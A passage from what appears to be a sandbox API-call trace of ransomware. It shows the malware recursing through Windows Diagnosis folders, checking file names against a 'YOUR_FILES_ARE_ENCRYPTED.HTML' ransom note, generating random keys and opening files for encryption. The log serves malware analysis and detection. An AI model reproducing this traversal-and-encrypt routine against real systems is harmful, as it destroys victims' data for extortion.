nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="WINDOWS.SIUF.xml", cAlternateFileName="WINDOW~2.XML")) returned 1 [0109.924] StrStrIW (lpFirst="WINDOWS.SIUF.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.924] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.SIUF.xml") returned 79 [0109.924] PathFindExtensionW (pszPath="WINDOWS.SIUF.xml") returned=".xml" [0109.924] lstrlenW (lpString=".xml") returned 4 [0109.924] PathFindExtensionW (pszPath="WINDOWS.SIUF.xml") returned=".xml" [0109.924] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0109.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.SIUF.xml" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.siuf.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.925] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b42b5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3a, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="Windows.Uif.static", cAlternateFileName="WINDOW~1.STA")) returned 1 [0109.925] StrStrIW (lpFirst="Windows.Uif.static", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.925] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\Windows.Uif.static") returned 81 [0109.925] PathFindExtensionW (pszPath="Windows.Uif.static") returned=".static" [0109.925] lstrlenW (lpString=".static") returned 7 [0109.925] PathFindExtensionW (pszPath="Windows.Uif.static") returned=".static" [0109.925] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xe080ca95, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe080ca95, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe080ca95, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x55, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="WINDOWS.UIF.xml", cAlternateFileName="WICECA~1.XML")) returned 1 [0109.925] StrStrIW (lpFirst="WINDOWS.UIF.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.925] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml") returned 78 [0109.925] PathFindExtensionW (pszPath="WINDOWS.UIF.xml") returned=".xml" [0109.925] lstrlenW (lpString=".xml") returned 4 [0109.925] PathFindExtensionW (pszPath="WINDOWS.UIF.xml") returned=".xml" [0109.925] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0109.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.925] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae68d5d4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae68d5d4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae692463, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.925] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae68d5d4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae68d5d4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae692463, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.925] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0109.925] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0109.925] GetProcessHeap () returned 0x600000 [0109.925] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedscenarios\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.926] GetProcessHeap () returned 0x600000 [0109.926] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.926] GetProcessHeap () returned 0x600000 [0109.926] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.926] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe1f25738, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe1f25738, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="DownloadedSettings", cAlternateFileName="DOWNLO~2")) returned 1 [0109.926] StrStrIW (lpFirst="DownloadedSettings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.927] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings") returned 61 [0109.927] GetProcessHeap () returned 0x600000 [0109.927] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.927] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings" [0109.927] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\*" [0109.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe1f25738, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xae6a83e6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName=".", cAlternateFileName="")) returned 0x626738 [0109.928] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe1f25738, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xae6a83e6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="..", cAlternateFileName="")) returned 1 [0109.928] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0xdfc4722e, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xdfc4722e, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xdff8e649, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x1c9, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="cfc.flights.json", cAlternateFileName="CFCFLI~1.JSO")) returned 1 [0109.928] StrStrIW (lpFirst="cfc.flights.json", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.928] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\cfc.flights.json") returned 78 [0109.928] PathFindExtensionW (pszPath="cfc.flights.json") returned=".json" [0109.928] lstrlenW (lpString=".json") returned 5 [0109.928] PathFindExtensionW (pszPath="cfc.flights.json") returned=".json" [0109.928] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0109.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\cfc.flights.json" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\cfc.flights.json"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.928] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x35b42b5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe0db65ac, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe1f25738, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x4a30b, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="telemetry.ASM-WindowsDefault.json", cAlternateFileName="TELEME~1.JSO")) returned 1 [0109.928] StrStrIW (lpFirst="telemetry.ASM-WindowsDefault.json", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.928] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json") returned 95 [0109.928] PathFindExtensionW (pszPath="telemetry.ASM-WindowsDefault.json") returned=".json" [0109.928] lstrlenW (lpString=".json") returned 5 [0109.928] PathFindExtensionW (pszPath="telemetry.ASM-WindowsDefault.json") returned=".json" [0109.928] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0109.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\telemetry.asm-windowsdefault.json"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.929] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b42b5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x334, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="telemetry.ASM-WindowsDefault.json.bk", cAlternateFileName="TELEME~1.BK")) returned 1 [0109.929] StrStrIW (lpFirst="telemetry.ASM-WindowsDefault.json.bk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.929] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\telemetry.ASM-WindowsDefault.json.bk") returned 98 [0109.929] PathFindExtensionW (pszPath="telemetry.ASM-WindowsDefault.json.bk") returned=".bk" [0109.929] lstrlenW (lpString=".bk") returned 3 [0109.929] PathFindExtensionW (pszPath="telemetry.ASM-WindowsDefault.json.bk") returned=".bk" [0109.929] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xe0964002, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xe0db65ac, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x14615, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="utc.app.json", cAlternateFileName="UTCAPP~1.JSO")) returned 1 [0109.929] StrStrIW (lpFirst="utc.app.json", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.929] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json") returned 74 [0109.929] PathFindExtensionW (pszPath="utc.app.json") returned=".json" [0109.929] lstrlenW (lpString=".json") returned 5 [0109.929] PathFindExtensionW (pszPath="utc.app.json") returned=".json" [0109.929] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0109.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\utc.app.json"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0109.929] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x598, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="utc.app.json.bk", cAlternateFileName="UTCAPP~1.BK")) returned 1 [0109.929] StrStrIW (lpFirst="utc.app.json.bk", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.929] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json.bk") returned 77 [0109.929] PathFindExtensionW (pszPath="utc.app.json.bk") returned=".bk" [0109.929] lstrlenW (lpString=".bk") returned 3 [0109.929] PathFindExtensionW (pszPath="utc.app.json.bk") returned=".bk" [0109.929] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6a83e6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6a83e6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6ad20d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.929] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6a83e6, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6a83e6, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6ad20d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.929] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0109.930] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0109.930] GetProcessHeap () returned 0x600000 [0109.930] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.930] GetProcessHeap () returned 0x600000 [0109.930] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.930] GetProcessHeap () returned 0x600000 [0109.930] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.931] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="ETLLogs", cAlternateFileName="")) returned 1 [0109.931] StrStrIW (lpFirst="ETLLogs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.931] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs") returned 50 [0109.931] GetProcessHeap () returned 0x600000 [0109.931] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.932] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs" [0109.932] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\*" [0109.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae6cf4e5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0109.932] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae6cf4e5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="..", cAlternateFileName="")) returned 1 [0109.932] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36f2be13, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x36f2be13, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c39e, dwReserved1=0x63c348, cFileName="AutoLogger", cAlternateFileName="AUTOLO~1")) returned 1 [0109.932] StrStrIW (lpFirst="AutoLogger", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.932] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger") returned 61 [0109.932] GetProcessHeap () returned 0x600000 [0109.932] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0109.933] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger" [0109.933] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*" [0109.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xae6ba8db, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a8, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.933] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xae6ba8db, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a8, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0109.933] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2000, ftCreationTime.dwLowDateTime=0xc088dfed, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x4b28b40c, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f3a8, dwReserved1=0x19e5b0, cFileName="AutoLogger-Diagtrack-Listener.etl", cAlternateFileName="AUTOLO~1.ETL")) returned 1 [0109.933] StrStrIW (lpFirst="AutoLogger-Diagtrack-Listener.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.933] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\AutoLogger-Diagtrack-Listener.etl") returned 95 [0109.933] PathFindExtensionW (pszPath="AutoLogger-Diagtrack-Listener.etl") returned=".etl" [0109.933] lstrlenW (lpString=".etl") returned 4 [0109.934] PathFindExtensionW (pszPath="AutoLogger-Diagtrack-Listener.etl") returned=".etl" [0109.934] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6ba8db, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae6ba8db, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae6be548, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x318f3a8, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.934] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae6ba8db, 